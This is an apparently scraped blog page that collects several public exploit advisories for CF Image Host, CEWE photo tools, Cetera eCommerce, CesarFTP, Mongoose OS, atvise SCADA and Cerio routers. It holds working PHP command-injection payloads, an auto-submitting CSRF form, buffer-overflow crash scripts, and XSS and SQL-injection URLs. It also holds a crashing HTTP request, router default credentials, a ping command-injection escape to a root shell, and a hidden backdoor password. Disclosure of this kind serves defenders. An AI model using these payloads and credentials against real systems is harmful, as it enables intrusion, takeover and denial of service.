[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-CFIMAGEHOST-PHP-CMD-INJECTION.txt
Vendor:
====================================
codefuture.co.uk/projects/imagehost
Product:
===================================
CF Image Host 1.65 - 1.6.6
Archive download listed as: version 1.65
unzips as imagehost 1.6.6
Vulnerability Type:
=====================
PHP Command Injection
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
CF Imagehost allows users who have access to the management area the
ability to write directly to the 'set.php' page under
the /inc directory that stores setting values for the 'Site Title', 'Site
Slogan' etc, this allows a local attacker ability to
inject specially crafted PHP command payloads to execute arbitrary
operating system commands on the victim host. Possibly leading
to privilege escalation, RFI, backdoors etc.. and most likely full
compromise of the affected system or shared environment
if applicable.
PHP Command Injection Exploit code(s):
=====================================
Under the setting tab we can inject following below PHP code and it will
remain persistent as it is written disk in 'set.php',
afterwards when the victim visits the application and click a tab the
persistent OS command will be executed.
1) navigate to CF image host settings tab
http://localhost/imagehost1.6.6/admin.php?act=set
2) click on admin menu on left and enter your passwords DO NOT click 'Save
changes' yet! or you get error message to enter creds
3) now go back to settings tab and click 'General' then inject below PHP
code into the 'Site Title' input field
4) now click 'Save Changes', this code will get stored under /inc
directory within the 'set.php' PHP file.
our PHP injection payload needs the single quotes, double back slashes,
semicolons as described below to correctly escape the syntax
so we do not break the PHP page and cause errors, our extra \\ quoutes and
; gets removed after injection takes place.
some examples...
';echo exec("c:\\Windows\\system32\\calc.exe");'';';
'set.php' on line 11 then becomes:
$settings['SET_TITLE'] = '';echo
exec("c:\Windows\system32\calc.exe");'';';';
OR inject CMD to launch chrome.exe etc...
';echo exec("c:\\Program Files
(x86)\\Google\\Chrome\\Application\\chrome.exe");'';';
After, click on some tabs above like 'Database' or 'Ban User' and Tada!
this will execute our stored PHP command...
either running calc.exe or launching Google Chrome.
Disclosure Timeline:
=====================
Vendor Notification: NA
November 13, 2015 : Public Disclosure
Exploitation Technique:
=======================
Local / Remote
Severity Level:
================
High
Description:
================================================================
Request Method(s): [+] POST
Vulnerable Product: [+] CF Image Host 1.65 - 1.6.6
Vulnerable Parameter(s): [+] 'Site Title', 'Site Slogan' etc..
Affected Area(s): [+] OS
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863130997
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
<!--
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-CFIMAGEHOST-CSRF.txt
Vendor:
====================================
codefuture.co.uk/projects/imagehost
Product:
===================================
CF Image Host 1.65 - 1.6.6
Archive download listed as: version 1.65
unzips as imagehost 1.6.6
Vulnerability Type:
=================================
Cross site request forgery - CSRF
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
No CSRF protection exists allowing attackers to make requests to the server
on behalf of the victim if they are logged in and visit a malicious site or
click
an infected linx. This will let attackers modify certain web application
settings to
whatever the attacker wishes.
CSRF Exploit code(s):
====================
-->
<form id='HELL' method="POST" action="
http://localhost/imagehost1.6.6/admin.php?act=set">
<input type="text" name="setScriptUrl" value="
http://hyp3rlinx.altervista.org" />
<input type="text" name="setTitle" value="ghostofsin" />
<input type="text" name="setSlogan" value="666" />
<input type="text" name="setCopyright" value="hyp3rlinx" />
<input type="text" name="setTheme" value="day" />
<input type="text" name="setModeRewrite" value="0" />
<input type="text" name="setAddThis" value="0" />
<input type="text" name="setLanguage" value="0" />
<input type="text" name="changesettings" value="Save+Changes" />
<input type="text" name="setModeRewrite" value="0" />
<input type="text" name="setAllowReport" value="1" />
<input type="text" name="setEmailReport" value="1" />
<input type="text" name="setHideGallery" value="1" />
<input type="text" name="setHideContact" value="1" />
<input type="text" name="setHideTos" value="1" />
<input type="text" name="setHideFaq" value="1" />
<input type="text" name="setHideSearch" value="1" />
<input type="text" name="setImageWidgit" value="1" />
<input type="text" name="setHideFeed" value="1" />
<input type="text" name="setHideSitemap" value="1" />
<input type="text" name="setAutoDeleted" value="0" />
<input type="text" name="setAutoDeletedTime" value="10" />
<input type="text" name="setAutoDeletedJump" value="m" />
<input type="text" name="setDisUpload" value="0" />
<input type="text" name="setAutoDeleted" value="0" />
<input type="text" name="setMaxSize" value="1048576" />
<input type="text" name="setMaxBandwidth" value="1024" />
<input type="text" name="setBandwidthReset" value="m" />
<input type="text" name="setMaxUpload" value="5" />
<input type="text" name="setNoDuplicate" value="0" />
<input type="text" name="setResizeImg" value="1" />
<input type="text" name="setPrivateImg" value="1" />
<input type="text" name="setWaterMark" value="0" />
<input type="text" name="setWatermarkText" value="0" />
<input type="text" name="setWatermarkImage" value="1" />
<input type="text" name="setWatermarkPlaced" value="1" />
<input type="text" name="setSUrlApi" value="b54" />
<input type="text" name="setSUrlApiUrl" value="" />
<input type="text" name="setSUrlApiUesr" value="" />
<input type="text" name="setSUrlApiPass" value="" />
<input type="text" name="setAnalytics" value="" />
<input type="text" name="setGoogleCha" value="" />
<input type="text" name="setGoogleAds" value="" />
<input type="text" name="oldPassword" value="" />
<input type="text" name="newPassword" value="" />
<input type="text" name="newConfirm" value="" />
<input type="text" name="setUserName" value="admin" />
<input type="text" name="setEmail" value="ghostofsin@abyss.com" />
<script>document.getElementById('HELL').submit()</script>
</form>
<!--
Disclosure Timeline:
=====================
Vendor Notification: NA
November 14, 2015 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
Description:
============================================================
Request Method(s): [+] POST
Vulnerable Product: [+] CF Image Host 1.65 - 1.6.6
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
-->
# -*- coding: utf-8 -*-
# Exploit Title: CEWE PHOTO SHOW 6.4.3 - Denial of Service (PoC)
# Date: 16/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://cewe-photoworld.com/
# Software: https://cewe-photoworld.com/creator-software/windows-download
# Version: 6.4.3
# Tested on: Windows 10
# Proof of Concept:
# 1.- Run the python script 'photoshow.py', it will create a new file 'photoshow.txt'
# 2.- Copy the text from the generated photoshow.txt file to clipboard
# 3.- Open CEWE PHOTO SHOW
# 4.- Click 'Upload'
# 5.- Paste clipboard in the field 'Password' and crashed
buffer = "\x41" * 5000
f = open ("photoshow.txt", "w")
f.write(buffer)
f.close()
# Exploit Title: CEWE Photoshow 6.3.4 - Denial of Service (PoC)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-08-17
# Homepage: https://cewe-photoworld.com/
# Software Link: https://cewe-photoworld.com/creator-software/windows-download
# Tested Version: 6.3.4
# Tested on OS: Windows 10
# Steps to Reproduce: Run the python exploit script, it will create a new
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
# and start the program. Once inside of the CEWE Photoshow program click "Login". In the new window paste the content of
# "exploit.txt" into the following fields:"email address" & "Password". Click "Ok" and you will see a crash.
#!/usr/bin/python
buffer = "A" * 4000
payload = buffer
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# -*- coding: utf-8 -*-
# Exploit Title: CEWE PHOTO IMPORTER 6.4.3 - Denial of Service (PoC)
# Date: 16/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://cewe-photoworld.com/
# Software: https://cewe-photoworld.com/creator-software/windows-download
# Version: 6.4.3
# Tested on: Windows 10
# Proof of Concept:
# 1.- Run the python script 'photoimporter.py',it will create a new file "sample.jpg"
# 2.- Open CEWE PHOTO IMPORTER
# 3.- Select the 'sample.jpg' file created and click 'Import all'
# 4.- Click 'Next' and 'Next', you will see a crash
buffer = "\x41" * 500000
f = open ("sample.jpg", "w")
f.write(buffer)
f.close()
source: https://www.securityfocus.com/bid/47044/info
Cetera eCommerce is prone to multiple cross-site scripting and SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Cetera eCommerce versions 15.0 and prior are vulnerable.
Cross Site Scripting:
http://www.example.com/catalog/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://www.example.com/vendors/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://www.example.com/catalog/cart/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://www.example.com/news/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://www.example.com/news/13012011111030/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://www.example.com/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
This vulnerability have appeared in version 15.0. Vulnerability takes place
at page with error 404, so it'll work as at this URL, as at other URLs,
which lead to non-existent pages.
SQL Injection:
http://www.example.com/catalog/(version()=5.1)/
http://www.example.com/catalog/cart/.+benchmark(100000,md5(now()))+./
#!/usr/bin/env python
#-*- coding:utf-8 -*-
# Exploit Title : CesarFTP 0.99g -(XCWD)Remote BoF Exploit
# Discovery by : Irving Aguilar
# Email : im.aguilar@protonmail.ch
# Discovery Date : 18.01.2016
# Tested Version : 0.99g
# Vulnerability Type : Denial of Service (DoS)
# Tested on OS : Windows XP Professional SP3 x86 es
import socket
buffer = 'XCWD ' + '\n' * 667 +'\x90' * 20
target = '192.168.1.73'
port = 21
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((target, port))
print '[*] Target: ' + target
print '[*] Port: ' + str(port)
s.recv(1024)
s.send('USER ftp\r\n')
s.recv(1024)
s.send('PASS ftp\r\n')
s.recv(1024)
s.send( buffer + '\r\n')
print '[+] Buffer sent'
s.close()
#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/en/research/advisories/
#
#############################################################
#
# Product: Mongoose OS
# Vendor: Cesanta
# CVE ID: CVE-2017-7185
# CSNC ID: CSNC-2017-003
# Subject: Use-after-free / Denial of Service
# Risk: Medium
# Effect: Remotely exploitable
# Authors:
# Philipp Promeuschel <philipp.promeuschel@compass-security.com>
# Carel van Rooyen <carel.vanrooyen@compass-security.com>
# Stephan Sekula <stephan.sekula@compass-security.com>
# Date: 2017-04-03
#
#############################################################
Introduction:
-------------
Cesanta's Mongoose OS [1] - an open source operating system for the Internet of Things. Supported micro controllers:
* ESP32
* ESP8266
* STM32
* TI CC3200
Additionally, Amazon AWS IoT is integrated for Cloud connectivity. Developers can write applications in C or JavaScript (the latter by using the v7 component of Mongoose OS).
Affected versions:
---------
Vulnerable:
* <= Release 1.2
Not vulnerable:
* Patched in current dev / master branch
Not tested:
* N/A
Technical Description
---------------------
The handling of HTTP-Multipart boundary [3] headers does not properly close connections when malformed requests are sent to the Mongoose server.
This leads to a use-after-free/null-pointer-de-reference vulnerability, causing the Mongoose HTTP server to crash. As a result, the entire system is rendered unusable.
The mg_parse_multipart [2] function performs proper checks for empty boundaries, but, since the flag "MG_F_CLOSE_IMMEDIATELY" does not have any effect, mg_http_multipart_continue() is called:
--------------->8---------------
void mg_http_handler(struct mg_connection *nc, int ev, void *ev_data) {
[CUT BY COMPASS]
#if MG_ENABLE_HTTP_STREAMING_MULTIPART
if (req_len > 0 && (s = mg_get_http_header(hm, "Content-Type")) != NULL &&
s->len >= 9 && strncmp(s->p, "multipart", 9) == 0) {
mg_http_multipart_begin(nc, hm, req_len); // properly checks for empty boundary
// however, the socket is not closed, and mg_http_multipart_continue() is executed
mg_http_multipart_continue(nc);
return;
}
---------------8<---------------
In the mg_http_multipart_begin function, the boundary is correctly verified:
--------------->8---------------
boundary_len =
mg_http_parse_header(ct, "boundary", boundary, sizeof(boundary));
if (boundary_len == 0) {
/*
* Content type is multipart, but there is no boundary,
* probably malformed request
*/
nc->flags = MG_F_CLOSE_IMMEDIATELY;
DBG(("invalid request"));
goto exit_mp;
}
---------------8<---------------
However, the socket is not closed (even though the flag "MG_F_CLOSE_IMMEDIATELY" has been set), and mg_http_multipart_continue is executed.
In mg_http_multipart_continue(), the method mg_http_multipart_wait_for_boundary() is executed:
---------------8<---------------
static void mg_http_multipart_continue(struct mg_connection *c) {
struct mg_http_proto_data *pd = mg_http_get_proto_data(c);
while (1) {
switch (pd->mp_stream.state) {
case MPS_BEGIN: {
pd->mp_stream.state = MPS_WAITING_FOR_BOUNDARY;
break;
}
case MPS_WAITING_FOR_BOUNDARY: {
if (mg_http_multipart_wait_for_boundary(c) == 0) {
return;
}
break;
}
--------------->8---------------
Then, mg_http_multipart_wait_for_boundary() tries to identify the boundary-string. However, this string has never been initialized, which causes c_strnstr to crash.
---------------8<---------------
static int mg_http_multipart_wait_for_boundary(struct mg_connection *c) {
const char *boundary;
struct mbuf *io = &c->recv_mbuf;
struct mg_http_proto_data *pd = mg_http_get_proto_data(c);
if ((int) io->len < pd->mp_stream.boundary_len + 2) {
return 0;
}
boundary = c_strnstr(io->buf, pd->mp_stream.boundary, io->len);
if (boundary != NULL) {
[CUT BY COMPASS]
--------------->8---------------
Steps to reproduce
-----------------
Request to HTTP server (code running on hardware device):
---------------8<---------------
POST / HTTP/1.1
Connection: keep-alive
Content-Type: multipart/form-data;
Content-Length: 1
1
--------------->8---------------
The above request results in a stack trace on the mongoose console:
---------------8<---------------
Guru Meditation Error of type LoadProhibited occurred on core 0. Exception was unhandled.
Register dump:
PC : 0x400014fd PS : 0x00060330 A0 : 0x801114b4 A1 : 0x3ffbfcf0
A2 : 0x00000000 A3 : 0xfffffffc A4 : 0x000000ff A5 : 0x0000ff00
A6 : 0x00ff0000 A7 : 0xff000000 A8 : 0x00000000 A9 : 0x00000085
A10 : 0xcccccccc A11 : 0x0ccccccc A12 : 0x00000001 A13 : 0x00000000
A14 : 0x00000037 A15 : 0x3ffbb3cc SAR : 0x0000000f EXCCAUSE: 0x0000001c
EXCVADDR: 0x00000000 LBEG : 0x400014fd LEND : 0x4000150d LCOUNT : 0xffffffff
Backtrace: 0x400014fd:0x3ffbfcf0 0x401114b4:0x3ffbfd00 0x401136cc:0x3ffbfd30 0x401149ac:0x3ffbfe30 0x40114b71:0x3ffbff00 0x40112b80:0x3ffc00a0 0x40112dc6:0x3ffc00d0 0x40113295:0x3ffc0100 0x4011361a:0x3ffc0170 0x40111716:0x3ffc01d0 0x40103b8f:0x3ffc01f0 0x40105099:0x3ffc0210
--------------->8---------------
Further debugging shows that an uninitialized string has indeed been passed to c_strnstr:
---------------8<---------------
(gdb) info symbol 0x401114b4
c_strnstr + 12 in section .flash.text
(gdb) list *0x401114b4
0x401114b4 is in c_strnstr (/mongoose-os/mongoose/mongoose.c:1720).
warning: Source file is more recent than executable.
1715 }
1716 #endif /* _WIN32 */
1717
1718 /* The simplest O(mn) algorithm. Better implementation are GPLed */
1719 const char *c_strnstr(const char *s, const char *find, size_t slen) WEAK;
1720 const char *c_strnstr(const char *s, const char *find, size_t slen) {
1721 size_t find_length = strlen(find);
1722 size_t i;
1723
1724 for (i = 0; i < slen; i++) {
(gdb) list *0x401136cc
0x401136cc is in mg_http_multipart_continue (/mongoose-os/mongoose/mongoose.c:5893).
5888 mg_http_free_proto_data_mp_stream(&pd->mp_stream);
5889 pd->mp_stream.state = MPS_FINISHED;
5890
5891 return 1;
5892 }
5893
5894 static int mg_http_multipart_wait_for_boundary(struct mg_connection *c) {
5895 const char *boundary;
5896 struct mbuf *io = &c->recv_mbuf;
5897 struct mg_http_proto_data *pd = mg_http_get_proto_data(c);
(gdb)
--------------->8---------------
Workaround / Fix:
-----------------
Apply the following (tested and confirmed) patch:
---------------8<---------------
$ diff --git a/mongoose/mongoose.c b/mongoose/mongoose.c
index 91dc8b9..063f8c6 100644
--- a/mongoose/mongoose.c
+++ b/mongoose/mongoose.c
@@ -5889,6 +5889,12 @@ static int mg_http_multipart_wait_for_boundary(struct mg_connection *c) {
return 0;
}
+ if(pd->mp_stream.boundary == NULL){
+ pd->mp_stream.state = MPS_FINALIZE;
+ LOG(LL_INFO, ("invalid request: boundary not initialized"));
+ return 0;
+ }
+
boundary = c_strnstr(io->buf, pd->mp_stream.boundary, io->len);
if (boundary != NULL) {
const char *boundary_end = (boundary + pd->mp_stream.boundary_len);
--------------->8---------------
The patch has been merged into Mongoose OS on github.com on 2017-04-03 [4]
Timeline:
---------
2017-04-03: Coordinated public disclosure date
2017-04-03: Release of patch
2017-03-20: Initial vendor response, code usage sign-off
2017-03-19: Initial vendor notification
2017-03-19: Assigned CVE-2017-7185
2017-03-11: Confirmation and patching Philipp Promeuschel, Carel van Rooyen
2017-03-08: Initial inspection Philipp Promeuschel, Carel van Rooyen
2017-03-08: Discovery by Philipp Promeuschel
References:
-----------
[1] https://www.cesanta.com/
[2] https://github.com/cesanta/mongoose/blob/66a96410d4336c312de32b1cf5db954aab9ee2ec/mongoose.c#L7760
[3] http://www.ietf.org/rfc/rfc2046.txt
[4] https://github.com/cesanta/mongoose-os/commit/042eb437973a202d00589b13d628181c6de5cf5b
Certec EDV atvise SCADA server 2.5.9 Privilege Escalation Vulnerability
Vendor: Certec EDV GmbH
Product web page: http://www.atvise.com
Affected version: 2.5.9
Summary: atvise scada is based on newest technologies
and standards: The visualization in pure web technology
as well as a consistent vertical object orientation based
on OPC UA changes the world of process management systems.
Desc: The application suffers from an unquoted search path
issue impacting the service 'atserver' for Windows deployed
as part of atvise SCADA. This could potentially allow an
authorized but non-privileged local user to execute arbitrary
code with elevated privileges on the system. A successful
attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or
other security applications where it could potentially be
executed during application startup or reboot. If successful,
the local user’s code would execute with the elevated privileges
of the application.
Tested on: Microsoft Windows 7 Professional SP1 (EN) 64-bit
Microsoft Windows 7 Ultimate SP1 (EN) 64-bit
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5321
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5321.php
Vendor: http://www.atvise.com/en/news-events/news/465-atvise-3-0-0-released
17.03.2016
---
C:\Users\user>sc qc atserver
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: atserver
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\atvise\atserver.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : atvise server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
CERIO 11nbg 2.4Ghz High Power Wireless Router (pekcmd) Rootshell Backdoors
Vendor: CERIO Corporation
Product web page: http://www.cerio.com.tw
Affected version: DT-100G-N (fw: Cen-WR-G2H5 v1.0.6)
DT-300N (fw: Cen-CPE-N2H10A v1.0.14)
DT-300N (fw: Cen-CPE-N2H10A v1.1.6)
CW-300N (fw: Cen-CPE-N2H10A v1.0.22)
Kozumi? (fw: Cen-CPE-N5H5R v1.1.1)
Summary: CERIO's DT-300N A4 eXtreme Power 11n 2.4Ghz 2x2
High Power Wireless Access Point with built-in 10dBi
patch antennas and also supports broadband wireless
routing. DT-300N A4's wireless High Power design
enhances the range and stability of the device's
wireless signal in office and home environments.
Another key hardware function of DT-300N A4 is its PoE
Bridging feature, which allows subsequent devices to
be powered through DT-300N A4's LAN port. This
reduces device cabling and allows for more convenient
deployment. DT-300N A4 utilizes a 533Mhz high power CPU base
with 11n 2x2 transmission rates of 300Mbps. This
powerful device can produce high level performance
across multiple rooms or large spaces such as offices,
schools, businesses and residential areas. DT-300N A4
is suitable for both indoor and outdoor deployment,
and utilizes an IPX6 weatherproof housing.
The DT-300N A4 hardware equipped with to bundles
Cerio CenOS 5.0 Software Core. CenOS 5.0 devices can
use integrated management functions of Control
Access Point (CAP Mode) to manage an AP network.
Desc: Cerio Wireless Access Point and Router suffers from
several vulnerabilities including: hard-coded and default
credentials, information disclosure, command injection and
hidden backdoors that allows escaping the restricted shell
into a root shell via the 'pekcmd' binary. Given that all
the processes run as root, an attacker can easily drop into
the root shell with supplying hard-coded strings stored in
.rodata segment assigned as static constant variables. The
pekcmd shell has several hidden functionalities for enabling
an advanced menu and modifying MAC settings as well as easily
escapable regex function for shell characters.
Tested on: Cenwell Linux 802.11bgn MIMO Wireless AP(AR9341)
RALINK(R) Cen-CPE-N5H2 (Access Point)
CenOS 5.0/4.0/3.0
Hydra/0.1.8
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5409
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5409.php
16.05.2017
---
Large number of devices uses the cenwell firmware (mips arch)
which comes with few surprises.
Default credentials (web interface):
------------------------------------
operator:1234
admin:admin
root:default
Default credentials (linux shell, ssh or telnet):
-------------------------------------------------
root:default
ate:default
Contents of /etc/passwd (DES):
------------------------------
root:deGewFOVmIs8E:0:0:root:/:/bin/pekcmd <---
The /bin/pekcmd binary is a restricted shell environment with
limited and customized set of commands that you can use for
administering the device once you've logged-in with the root:default
credentials.
➜ ~ telnet 10.0.0.17
Trying 10.0.0.17...
Connected to 10.0.0.17.
Escape character is '^]'.
Login: root
Password: *******
command>
command> help
Avaliable commands:
info Show system informations
ping Ping!
clear clear screen
default Set default and reboot
passwd Change root password
reboot Reboot
ifconfig IP Configuration
iwconfig Configure a WLAN interface
iwpriv Configure private parameters of a WLAN interface
exit Exit
help show this help
command> id
id: no such command
command>
Analyzing the pekcmd binary revealed the hidden backdoors and the
hidden advanced menu. Here is the invalid characters check function:
-------------------------------------------------------------------------
.text:00401F60 check_shellchars:
.text:00401F60 li $gp, 0x1FB00
.text:00401F68 addu $gp, $t9
.text:00401F6C addiu $sp, -0x38
.text:00401F70 sw $ra, 0x38+var_4($sp)
.text:00401F74 sw $s2, 0x38+var_8($sp)
.text:00401F78 sw $s1, 0x38+var_C($sp)
.text:00401F7C sw $s0, 0x38+var_10($sp)
.text:00401F80 sw $gp, 0x38+var_28($sp)
.text:00401F84 la $a1, 0x410000
.text:00401F88 la $t9, memcpy
.text:00401F8C addiu $s0, $sp, 0x38+var_20
.text:00401F90 move $s2, $a0
.text:00401F94 addiu $a1, (asc_409800 - 0x410000) # ";><|$~*{}()"
.text:00401F98 move $a0, $s0 # dest
.text:00401F9C jalr $t9 ; memcpy
.text:00401FA0 li $a2, 0xB # n
.text:00401FA4 lw $gp, 0x38+var_28($sp)
.text:00401FA8 b loc_401FE4
.text:00401FAC addiu $s1, $sp, 0x38+var_15
.text:00401FB0 lb $a1, 0($s0) # c
.text:00401FB4 jalr $t9 ; strchr
.text:00401FB8 addiu $s0, 1
.text:00401FBC lw $gp, 0x38+var_28($sp)
.text:00401FC0 beqz $v0, loc_401FE4
.text:00401FC4 move $a1, $v0
.text:00401FC8 la $a0, 0x410000
.text:00401FCC la $t9, printf
.text:00401FD0 nop
.text:00401FD4 jalr $t9 ; printf
.text:00401FD8 addiu $a0, (aIllegalArgumen - 0x410000) # "illegal argument: %s\n"
.text:00401FDC b loc_402000
.text:00401FE0 nop
.text:00401FE4 la $t9, strchr
.text:00401FE8 bne $s0, $s1, loc_401FB0
.text:00401FEC move $a0, $s2 # command
.text:00401FF0 la $t9, system
.text:00401FF4 nop
.text:00401FF8 jalr $t9 ; system
.text:00401FFC nop
.text:00402000 lw $ra, 0x38+var_4($sp)
.text:00402004 lw $gp, 0x38+var_28($sp)
.text:00402008 move $v0, $zero
.text:0040200C lw $s2, 0x38+var_8($sp)
.text:00402010 lw $s1, 0x38+var_C($sp)
.text:00402014 lw $s0, 0x38+var_10($sp)
.text:00402018 jr $ra
.text:0040201C addiu $sp, 0x38
.text:0040201C # End of function check_shellchars
-------------------------------------------------------------------------
command> ping 127.0.0.1 -c 1 | id
illegal argument: | id
command>
Escaping the restricted shell using Ping command injection:
command> ping 127.0.0.1 -c1 && id
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.3 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.3/0.3/0.3 ms
uid=0(root) gid=0(root)
We can easily drop into a sh:
command> ping 127.0.0.1 -c1 && sh
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.3 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.3/0.3/0.3 ms
BusyBox v1.11.2 (2014-07-29 12:05:26 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
~ # id
uid=0(root) gid=0(root)
~ # ls
bin dev etc_ro lib mount pekcmd reset sys tmpetc tmpvar var
cfg etc home mnt pek proc sbin tmp tmphome usr
~ # cat /etc/passwd
root:deGewFOVmIs8E:0:0:root:/:/bin/pekcmd
~ # uname -a
Linux (none) 2.6.31--LSDK-9.2.0_U9.915 #9 Mon Aug 11 09:48:52 CST 2014 mips unknown
~ # cd etc
/etc # cat hostapd0.conf
interface=ath0
ssid={{SSID_OMITTED}}
macaddr_acl=0
logger_syslog=-1
logger_syslog_level=2
logger_stdout=-1
logger_stdout_level=2
dump_file=/tmp/hostapd0.dump
ctrl_interface=/var/run/hostapd
ctrl_interface_group=0
rts_threshold=2346
fragm_threshold=2346
max_num_sta=32
wpa_group_rekey=600
wpa_gmk_rekey=86400
wpa_pairwise=TKIP
wpa=2
wpa_passphrase=0919067031
/etc # cat version
Atheros/ Version 1.0.1 with AR7xxx -- 三 2月 5 17:30:42 CST 2014
/etc # cd /home/httpd/cgi-bin
/home/httpd/cgi-bin # cat .htpasswd
root:deGewFOVmIs8E
/home/httpd/cgi/bin # cd /cfg
/cfg # ls -al
drwxr-xr-x 2 root root 0 Jan 1 00:00 .
drwxr-xr-x 23 1000 1000 305 Feb 5 2014 ..
-rw-r--r-- 1 root root 7130 Jan 1 00:00 config
-rwxrwxrwx 1 root root 427 Jan 1 00:00 rsa_host_key
-rwxrwxrwx 1 root root 225 Jan 1 00:00 rsa_host_key.pub
-rw-r--r-- 1 root root 22 Jan 1 00:00 telnet.conf
/cfg # cat telnet.conf
Root_password=default
/cfg # cat config |grep pass
Root_password "default"
Admin_password "admin"
/cfg # exit
command>
The hidden 'art' command backdoor enabling root shell, calling system sh
using password: 111222333:
-------------------------------------------------------------------------
la $a0, 0x410000
la $t9, strcmp
addiu $a1, $sp, 0xB8+var_A0 # s2
jalr $t9 ; strcmp
addiu $a0, (a111222333 - 0x410000) # "111222333"
lw $gp, 0xB8+var_A8($sp)
sltu $s0, $zero, $v0
.text:004035D8 loc_4035D8:
.text:004035D8 la $a1, 0x410000
.text:004035DC la $t9, strcpy
.text:004035E0 addiu $s0, $sp, 0xB8+var_8C
.text:004035E4 addiu $a1, (aArt - 0x410000) # "ART"
.text:004035E8 move $a0, $s0 # dest
.text:004035EC sw $zero, 0xB8+var_8C($sp)
.text:004035F0 sw $zero, 4($s0)
.text:004035F4 sw $zero, 8($s0)
.text:004035F8 sw $zero, 0xC($s0)
.text:004035FC jalr $t9 ; strcpy
.text:00403600 sw $zero, 0x10($s0)
.text:00403604 lw $gp, 0xB8+var_A8($sp)
.text:00403608 nop
.text:0040360C la $t9, strlen
.text:00403610 nop
.text:00403614 jalr $t9 ; strlen
.text:00403618 move $a0, $s0 # s
.text:0040361C lw $gp, 0xB8+var_A8($sp)
.text:00403620 move $a3, $zero # flags
.text:00403624 addiu $a2, $v0, 1 # n
.text:00403628 la $t9, send
.text:0040362C move $a0, $s1 # fd
.text:00403630 jalr $t9 ; send
.text:00403634 move $a1, $s0 # buf
.text:00403638 lw $gp, 0xB8+var_A8($sp)
.text:0040363C move $a1, $s0 # buf
.text:00403640 li $a2, 0x14 # nbytes
.text:00403644 la $t9, read
.text:00403648 nop
.text:0040364C jalr $t9 ; read
.text:00403650 move $a0, $s1 # fd
.text:00403654 lw $gp, 0xB8+var_A8($sp)
.text:00403658 nop
.text:0040365C la $t9, close
.text:00403660 nop
.text:00403664 jalr $t9 ; close
.text:00403668 move $a0, $s1 # fd
.text:0040366C lw $gp, 0xB8+var_A8($sp)
.text:00403670 nop
.text:00403674 la $a0, 0x410000
.text:00403678 la $t9, puts
.text:0040367C nop
.text:00403680 jalr $t9 ; puts
.text:00403684 addiu $a0, (aEnterArtMode - 0x410000) # "\n\n===>Enter ART Mode"
.text:00403688 lw $gp, 0xB8+var_A8($sp)
.text:0040368C nop
.text:00403690 la $v0, stdout
.text:00403694 la $t9, fflush
.text:00403698 lw $a0, (stdout - 0x41A000)($v0) # stream
.text:0040369C jalr $t9 ; fflush
.text:004036A0 nop
.text:004036A4 lw $gp, 0xB8+var_A8($sp)
.text:004036A8 nop
.text:004036AC la $a0, 0x410000
.text:004036B0 la $t9, system
.text:004036B4 addiu $a0, (aSh - 0x410000) # "sh"
-------------------------------------------------------------------------
command> art
Enter password
===>Enter ART Mode
BusyBox v1.11.2 (2014-07-28 12:48:51 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
~ # id
uid=0(root) gid=0(root)
